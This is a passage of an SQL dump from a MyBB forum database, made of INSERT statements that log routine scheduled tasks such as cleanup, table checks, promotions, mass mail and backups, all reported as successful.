`mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13969', '1', '1351714092', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13970', '7', '1351714944', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13971', '5', '1351714977', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13972', '9', '1351714993', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13973', '5', '1351715170', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13974', '9', '1351715844', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13975', '3', '1351715861', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13976', '9', '1351716125', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13977', '5', '1351717282', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13978', '9', '1351717463', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13979', '3', '1351717473', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13980', '1', '1351717480', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13981', '7', '1351717482', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13982', '5', '1351719661', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13983', '9', '1351720109', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13984', '3', '1351720118', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13985', '5', '1351720132', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13986', '9', '1351721680', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13987', '3', '1351721682', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13988', '1', '1351721689', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13989', '7', '1351721690', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13990', '5', '1351721694', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13991', '5', '1351723912', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13992', '9', '1351723960', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13993', '3', '1351723961', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13994', '9', '1351724238', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13995', '3', '1351724458', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13996', '1', '1351724489', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13997', '7', '1351724497', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13998', '5', '1351724777', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('13999', '9', '1351725261', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14000', '5', '1351726756', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14001', '9', '1351726772', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14002', '3', '1351726774', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14003', '9', '1351726872', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14004', '5', '1351727758', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14005', '9', '1351727785', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14006', '3', '1351728050', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14007', '1', '1351728103', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14008', '2', '1351728126', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14009', '7', '1351728135', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14010', '5', '1351728307', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14011', '9', '1351731454', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14012', '5', '1351731604', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14013', '3', '1351731611', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14014', '1', '1351731623', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14015', '7', '1351731628', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14016', '5', '1351732173', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14017', '9', '1351732271', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14018', '5', '1351733291', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14019', '9', '1351733314', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14020', '3', '1351733697', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14021', '9', '1351734135', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14022', '5', '1351734338', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14023', '9', '1351735578', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14024', '3', '1351735581', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14025', '1', '1351735593', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14026', '7', '1351735600', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14027', '5', '1351735635', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14028', '9', '1351735821', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14029', '5', '1351736782', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14030', '9', '1351736795', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14031', '3', '1351737258', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14032', '9', '1351737626', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14033', '5', '1351738122', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14034', '9', '1351739575', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14035', '3', '1351739579', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14036', '1', '1351740233', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14037', '7', '1351740244', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14038', '5', '1351740248', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14039', '5', '1351740305', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14040', '9', '1351740400', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14041', '3', '1351740605', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14042', '9', '1351741211', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14043', '9', '1351741744', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14044', '9', '1351741752', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14045', '5', '1351741877', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14046', '9', '1351742729', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14047', '3', '1351742735', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14048', '1', '1351742802', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14049', '7', '1351742808', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14707', '5', '1351999761', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14708', '3', '1351999827', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14709', '9', '1352000513', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14710', '5', '1352000803', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14711', '9', '1352001453', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14712', '3', '1352002107', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14713', '1', '1352002158', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14714', '7', '1352002235', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14715', '5', '1352002295', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14716', '9', '1352005459', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14717', '5', '1352005562', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14718', '3', '1352005793', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14719', '1', '1352005799', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14720', '7', '1352005810', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14721', '9', '1352006089', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14722', '5', '1352006838', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14723', '9', '1352006848', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14724', '3', '1352007020', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14725', '9', '1352007720', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14726', '5', '1352007941', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14727', '9', '1352008696', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14728', '3', '1352008752', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14729', '1', '1352008981', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14730', '7', '1352009357', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14731', '5', '1352009387', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14732', '9', '1352009552', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14733', '5', '1352010334', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14734', '9', '1352010450', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14735', '3', '1352010614', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14736', '9', '1352011215', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14737', '5', '1352011564', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14738', '9', '1352012155', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14739', '3', '1352012373', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14740', '1', '1352012406', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14741', '7', '1352012426', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14742', '5', '1352012746', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14743', '9', '1352013035', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14744', '5', '1352014390', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14745', '9', '1352014391', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14746', '3', '1352014392', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14747', '9', '1352016317', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14748', '5', '1352017281', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14749', '3', '1352018010', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14750', '1', '1352018131', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14751', '7', '1352018460', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14752', '9', '1352018574', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14753', '5', '1352018649', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14754', '5', '1352018719', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14755', '9', '1352019359', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14756', '3', '1352020051', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14757', '1', '1352020062', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14758', '7', '1352020077', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14759', '5', '1352020159', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14760', '9', '1352020481', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14761', '5', '1352023230', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14762', '9', '1352023257', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14763', '3', '1352023962', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14764', '1', '1352023997', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14765', '7', '1352024033', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14766', '5', '1352025446', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14767', '9', '1352025526', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14768', '3', '1352025625', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14769', '9', '1352029947', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14770', '5', '1352030102', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14771', '3', '1352030109', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14772', '1', '1352030211', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14773', '7', '1352030227', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14774', '9', '1352030334', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14775', '3', '1352030350', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14776', '1', '1352030774', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14777', '4', '1352030782', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14778', '7', '1352030789', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14779', '5', '1352030799', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14780', '9', '1352031811', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14781', '5', '1352032332', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14782', '9', '1352032380', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14783', '3', '1352033028', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14784', '9', '1352033093', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14785', '5', '1352033287', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14786', '9', '1352033805', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14787', '3', '1352033944', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14788', '1', '1352034191', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14789', '7', '1352034210', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14790', '5', '1352034533', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14791', '9', '1352034606', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14792', '5', '1352035905', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14793', '9', '1352035912', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14794', '3', '1352035923', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14795', '9', '1352037377', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14796', '5', '1352037418', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14797', '3', '1352037807', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14798', '1', '1352037810', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14799', '7', '1352037815', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14800', '5', '1352037998', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14801', '9', '1352038295', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14802', '5', '1352039608', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14803', '9', '1352039638', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14804', '3', '1352039717', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14805', '9', '1352040485', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14806', '5', '1352040778', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14807', '9', '1352041138', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14808', '3', '1352041156', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14809', '1', '1352041330', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14810', '7', '1352041442', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14811', '5', '1352041526', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14812', '9', '1352041860', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14813', '5', '1352042921', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14814', '9', '1352043049', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14815', '3', '1352043372', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14816', '9', '1352043790', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14817', '5', '1352044228', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14818', '9', '1352044966', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14819', '3', '1352044968', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14820', '1', '1352044975', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14821', '7', '1352045684', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14822', '5', '1352046108', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14823', '9', '1352046173', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14824', '5', '1352046411', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14825', '9', '1352046550', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14826', '3', '1352046726', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14827', '9', '1352047329', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14828', '5', '1352047648', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14829', '9', '1352116008', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14830', '3', '1352116008', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` 